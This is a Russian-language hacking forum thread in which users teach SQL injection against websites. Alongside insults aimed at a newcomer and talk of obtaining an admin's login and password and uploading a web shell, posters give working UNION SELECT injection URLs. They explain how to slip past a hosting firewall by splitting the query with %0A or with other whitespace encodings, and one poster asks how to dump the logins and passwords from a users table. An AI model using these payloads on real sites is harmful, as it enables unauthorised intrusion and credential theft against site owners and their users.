странный ты какой-то.. тебе уже раз 20 объясняли что наличие ошибки не говорит о наличии скули, что не вывод инфы не говорит о наличии скули, тебе сказали как узнать на 100% о наличии скули, ты даже сказал что прочитал все маны и всё понял. странный ты какой-то...
тебе дали запрос с пассом админа и его логином..что тебе еще дать? сразу за тебя залить шелл? ты еще попробуй и потребуй что бы за тебя шелл залили !
малыш..иди делай уроки..еще недорос такими словами говорить.если ты недоумок не поня; до сих пор для чего раздел вопросы по уявимостям то это не моя вина..просишь залить шелл? здуй в раздел по просьбам. пост можно удалить после прочтения онного троллем что отписался выше.
Запрос отвергнут при вводе последнего в запрос "+from+information_schema.tables--" выкидывает на хостинг типа небезопасный запрос, как с этим бороться?
разбей запрос на 2 строки c помощью %0A http://www.site.ru/comment.php?idart=-11364+union+%0A+select+1,2,table_name,4,5,6+from+information_schema.tables--
это enter на свебе блочится конструкция union select from, чтобы обойти фильтр разбиваем запрос на несколько строк.
Помимо самого пробела есть еще несколько пробельных символов, которые MySQL воспринимает как пробел, это: %09 – табуляция %0A – символ новой строка %0D – возврат каретки %0B – вертикальная табуляция %0C – символ новой страницы Какой нибудь из этих символов может да и пропустит фильтр. Пример: http://xxx/news.php?id=1'%09UNION%09SELECT%091,2,3,4,5,6%09FROM%09Users%0 9WHERE%09login='admin'#
блочится конструкция union select from, находящаяся на одной строке, т.е. поможет только символ переноса строки.
этот запрос вывел мой таблички на ура и есть таблица users как его вывести? а потом с него логин и пасс, может кто нибудь чуток обьяснить? хостинг свеб!
